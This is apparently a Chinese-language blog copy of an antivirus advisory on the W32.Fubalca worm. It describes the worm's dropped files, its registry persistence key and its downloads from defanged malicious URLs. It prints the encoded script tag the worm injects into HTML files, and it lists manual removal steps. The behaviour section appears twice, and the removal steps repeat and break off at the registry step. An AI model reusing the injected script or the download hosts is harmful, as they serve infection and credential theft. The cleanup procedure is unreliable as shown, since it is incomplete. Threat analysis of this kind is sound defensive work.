close
2007-07-09 透過可移除式裝置散播的W32.Fubalca
病毒型態:
蠕蟲
影響平台:
Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
概述:
W32.Fubalca是一種蠕蟲,透過可移除式裝置來散播,並且會感染多項檔案類型,如*.exe、*.html。
說明:
當W32.Fubalca被執行時,詳細動作如下:
1.產生下列檔案:
%System%\sysload3.exe
%System%\tempIcon.exe
%System%\[RANDOM FILE NAME].tmp
%System%\tempload.exe
2.複製下列檔案至所有磁碟之根目錄下:
tool.exe
autorun.ind
3.產生下列登錄項目(registry entries),使該病毒將在每次開機時被執行:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
"System Boot Check" = "%SYSTEM%\sysload3.exe"
4.感染notepad.exe及IExplore.exe。
5.連結至下列網站下載設定檔:
[http://]a.2007ip.com/css[已移除]
6.下載並執行所有列在上述設定檔中的檔案。透過下列連結下載:
[http://]61.153.247.76/cald/01.[已移除]
[http://]61.153.247.76/cald/02.[已移除]
[http://]61.153.247.76/cald/03.[已移除]
[http://]61.153.247.76/cald/04.[已移除]
[http://]61.153.247.76/cald/05.[已移除]
[http://]61.153.247.76/cald/06.[已移除]
[http://]61.153.247.76/cald/07.[已移除]
7.上述檔案皆為病毒Infostealer.Gampass及Infostealer.Perfwo的複製。
8.該設定檔更包含連結[http://]if.iloveck.com/test/hos[已移除],用來使hosts檔案加入下列內容:
127.0.0.1 localhost
127.0.0.1 mmm.caifu18.net
127.0.0.1 www.18dmm.com
127.0.0.1 d.qbbd.com
127.0.0.1 www.5117music.com
127.0.0.1 www.union123.com
127.0.0.1 www.wu7x.cn
127.0.0.1 www.54699.com
127.0.0.1 60.169.0.66
127.0.0.1 60.169.1.29
127.0.0.1 www.97725.com
127.0.0.1 down.97725.com
127.0.0.1 ip.315hack.com
127.0.0.1 ip.54liumang.com
127.0.0.1 www.41ip.com
127.0.0.1 xulao.com
127.0.0.1 www.heixiou.com
127.0.0.1 www.9cyy.com
127.0.0.1 www.hunll.com
127.0.0.1 www.down.hunll.com
127.0.0.1 do.77276.com
127.0.0.1 www.baidulink.com
127.0.0.1 adnx.yygou.cn
127.0.0.1 222.73.220.45
127.0.0.1 www.f5game.com
127.0.0.1 www.guazhan.cn
127.0.0.1 wm,103715.com
127.0.0.1 www.my6688.cn
127.0.0.1 i.96981.com
127.0.0.1 d.77276.com
127.0.0.1 www1.cw988.cn
127.0.0.1 cool.47555.com
127.0.0.1 www.asdwc.com
127.0.0.1 55880.cn
127.0.0.1 61.152.169.234
127.0.0.1 cc.wzxqy.com
127.0.0.1 www.54699.com
9.感染所有非開機磁碟中,具有下列副檔名的檔案:
*.exe
*.asp
*.jsp
*.php
*.htm
*.aspx
*.html
10.被感染後的*.html檔案將包含下列javascript程式碼:
[Script language="java Script" src="[http://]%6D%61%63%72%2E%6D%69%63%72%6F%66%73%6F%
74%2E%63%6F%6D/Noind[REMOVED]">[/script]
11.在javascript程式碼中也會使用[div]標籤來加入連結[http://]macr.microfsot.com/Adm[已移除]
,透過該連結來下載病毒Trojan.Anicmoo的複製品,以及從網站[http://]a.2007ip.com/5949645
[已移除]下載蠕蟲。而該病毒會透過弱點Microsoft Windows Cursor And Icon ANI Format
Handling Remote Buffer Overflow Vulnerability (BID 23194)攻擊,蠕蟲則是產生名為
MyInfect的mutex類別檔。
1.產生下列檔案:
%System%\sysload3.exe
%System%\tempIcon.exe
%System%\[RANDOM FILE NAME].tmp
%System%\tempload.exe
2.複製下列檔案至所有磁碟之根目錄下:
tool.exe
autorun.ind
3.產生下列登錄項目(registry entries),使該病毒將在每次開機時被執行:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
"System Boot Check" = "%SYSTEM%\sysload3.exe"
4.感染notepad.exe及IExplore.exe。
5.連結至下列網站下載設定檔:
[http://]a.2007ip.com/css[已移除]
6.下載並執行所有列在上述設定檔中的檔案。透過下列連結下載:
[http://]61.153.247.76/cald/01.[已移除]
[http://]61.153.247.76/cald/02.[已移除]
[http://]61.153.247.76/cald/03.[已移除]
[http://]61.153.247.76/cald/04.[已移除]
[http://]61.153.247.76/cald/05.[已移除]
[http://]61.153.247.76/cald/06.[已移除]
[http://]61.153.247.76/cald/07.[已移除]
7.上述檔案皆為病毒Infostealer.Gampass及Infostealer.Perfwo的複製。
8.該設定檔更包含連結[http://]if.iloveck.com/test/hos[已移除],用來使hosts檔案加入下列內容:
127.0.0.1 localhost
127.0.0.1 mmm.caifu18.net
127.0.0.1 www.18dmm.com
127.0.0.1 d.qbbd.com
127.0.0.1 www.5117music.com
127.0.0.1 www.union123.com
127.0.0.1 www.wu7x.cn
127.0.0.1 www.54699.com
127.0.0.1 60.169.0.66
127.0.0.1 60.169.1.29
127.0.0.1 www.97725.com
127.0.0.1 down.97725.com
127.0.0.1 ip.315hack.com
127.0.0.1 ip.54liumang.com
127.0.0.1 www.41ip.com
127.0.0.1 xulao.com
127.0.0.1 www.heixiou.com
127.0.0.1 www.9cyy.com
127.0.0.1 www.hunll.com
127.0.0.1 www.down.hunll.com
127.0.0.1 do.77276.com
127.0.0.1 www.baidulink.com
127.0.0.1 adnx.yygou.cn
127.0.0.1 222.73.220.45
127.0.0.1 www.f5game.com
127.0.0.1 www.guazhan.cn
127.0.0.1 wm,103715.com
127.0.0.1 www.my6688.cn
127.0.0.1 i.96981.com
127.0.0.1 d.77276.com
127.0.0.1 www1.cw988.cn
127.0.0.1 cool.47555.com
127.0.0.1 www.asdwc.com
127.0.0.1 55880.cn
127.0.0.1 61.152.169.234
127.0.0.1 cc.wzxqy.com
127.0.0.1 www.54699.com
9.感染所有非開機磁碟中,具有下列副檔名的檔案:
*.exe
*.asp
*.jsp
*.php
*.htm
*.aspx
*.html
10.被感染後的*.html檔案將包含下列javascript程式碼:
[Script language="java Script" src="[http://]%6D%61%63%72%2E%6D%69%63%72%6F%66%73%6F%
74%2E%63%6F%6D/Noind[REMOVED]">[/script]
11.在javascript程式碼中也會使用[div]標籤來加入連結[http://]macr.microfsot.com/Adm[已移除]
,透過該連結來下載病毒Trojan.Anicmoo的複製品,以及從網站[http://]a.2007ip.com/5949645
[已移除]下載蠕蟲。而該病毒會透過弱點Microsoft Windows Cursor And Icon ANI Format
Handling Remote Buffer Overflow Vulnerability (BID 23194)攻擊,蠕蟲則是產生名為
MyInfect的mutex類別檔。
解決方案:
1.暫時關閉系統還原功能 (Windows Me/XP)
系統還原功能能夠使系統回復到預設狀態,假如電腦的資料毀損,則可以用來復原資料。
系統還原功能也會記錄下病毒、蠕蟲或是木馬的感染。Windows 預防任何外部程式來修改
系統還原功能,當然也包括了防毒軟體。因此防毒軟體或是工具無法移除系統還原資料夾
中的威脅。即使已經在其他的資料夾清除了感染的檔案還是有可能經由系統還原來回復受感染的檔案。
關閉系統還原功能的方法可以閱讀Windows 的文件或是參考以下網頁:
關閉Windows Me還原功能
關閉Windows XP還原功能
2.開啟hosts檔案,刪除所有被病毒加入的項目
(a)至下列位置:
Windows 95/98/Me:
%Windir%
Windows NT/2000/XP:
%Windir%\System32\drivers\etc
(b)點選hosts檔案
(c)必要的話,取消選取”永遠用選取的程式來開啟這種檔案”
(d)使用程式Notepad來開啟
(e)檔案開啟後,刪除所有病毒所加入的項目
(f)關閉並儲存檔案
3.更新病毒定義檔
至所使用防毒軟體之公司網站下載最新的病毒定義檔
賽門鐵克
趨勢科技
4.執行全系統掃描
(a)執行防毒軟體,並設定為執行全系統掃描
(b)如果偵測到病毒,則採取防毒軟體所建議的步驟
(註1)如果沒有防毒軟體,可以到以下網站線上掃毒:
http://www.kaspersky.com.tw/virusscanner/#
http://www3.ca.com/securityadvisor/virusinfo/scan.aspx
http://housecall.trendmicro.com/
(註2)如果防毒軟體無法刪除病毒,則需重新啟動至安全模式,
依防毒軟體指示刪除病毒,再進行下一步驟。
(註3)如果出現檔案遺失的訊息,在完全移除病毒後便不會再出現,請點選「確定」略過訊息。
(註4)如何開啟安全模式請參考。
http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/docid
/2001052409420406?OpenDocument&src=sec_doc_nam
(c)如果掃描出任何病毒,請刪除病毒
(註)假如防毒產品無法移除受感染的檔案,請以安全模式開啟,並再次執行掃毒程序,
移除受感染的檔案後再重新開機至正常模式。重新開機時會有警告訊息
(Warning messages),因為此時威脅仍未完全解除,可忽略此警訊點選OK,
指令完全移除後,重新開機便不會再出現警訊,警告訊息呈現如下列所示:
Title: [FILE PATH]
Message body: Windows cannot find [FILE NAME].
Make sure you typed the name correctly, and then try again.
To search for a file, click the Start button, and then click Search.
5.刪除登入檔內的值(value):
(a)滑鼠左鍵點選 開始\執行
(b)鍵入 regedit
系統還原功能能夠使系統回復到預設狀態,假如電腦的資料毀損,則可以用來復原資料。
系統還原功能也會記錄下病毒、蠕蟲或是木馬的感染。Windows 預防任何外部程式來修改
系統還原功能,當然也包括了防毒軟體。因此防毒軟體或是工具無法移除系統還原資料夾
中的威脅。即使已經在其他的資料夾清除了感染的檔案還是有可能經由系統還原來回復受感染的檔案。
關閉系統還原功能的方法可以閱讀Windows 的文件或是參考以下網頁:
關閉Windows Me還原功能
關閉Windows XP還原功能
2.開啟hosts檔案,刪除所有被病毒加入的項目
(a)至下列位置:
Windows 95/98/Me:
%Windir%
Windows NT/2000/XP:
%Windir%\System32\drivers\etc
(b)點選hosts檔案
(c)必要的話,取消選取”永遠用選取的程式來開啟這種檔案”
(d)使用程式Notepad來開啟
(e)檔案開啟後,刪除所有病毒所加入的項目
(f)關閉並儲存檔案
3.更新病毒定義檔
至所使用防毒軟體之公司網站下載最新的病毒定義檔
賽門鐵克
趨勢科技
4.執行全系統掃描
(a)執行防毒軟體,並設定為執行全系統掃描
(b)如果偵測到病毒,則採取防毒軟體所建議的步驟
(註1)如果沒有防毒軟體,可以到以下網站線上掃毒:
http://www.kaspersky.com.tw/virusscanner/#
http://www3.ca.com/securityadvisor/virusinfo/scan.aspx
http://housecall.trendmicro.com/
(註2)如果防毒軟體無法刪除病毒,則需重新啟動至安全模式,
依防毒軟體指示刪除病毒,再進行下一步驟。
(註3)如果出現檔案遺失的訊息,在完全移除病毒後便不會再出現,請點選「確定」略過訊息。
(註4)如何開啟安全模式請參考。
http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/docid
/2001052409420406?OpenDocument&src=sec_doc_nam
(c)如果掃描出任何病毒,請刪除病毒
(註)假如防毒產品無法移除受感染的檔案,請以安全模式開啟,並再次執行掃毒程序,
移除受感染的檔案後再重新開機至正常模式。重新開機時會有警告訊息
(Warning messages),因為此時威脅仍未完全解除,可忽略此警訊點選OK,
指令完全移除後,重新開機便不會再出現警訊,警告訊息呈現如下列所示:
Title: [FILE PATH]
Message body: Windows cannot find [FILE NAME].
Make sure you typed the name correctly, and then try again.
To search for a file, click the Start button, and then click Search.
5.刪除登入檔內的值(value):
(a)滑鼠左鍵點選 開始\執行
(b)鍵入 regedit
全站熱搜
留言列表
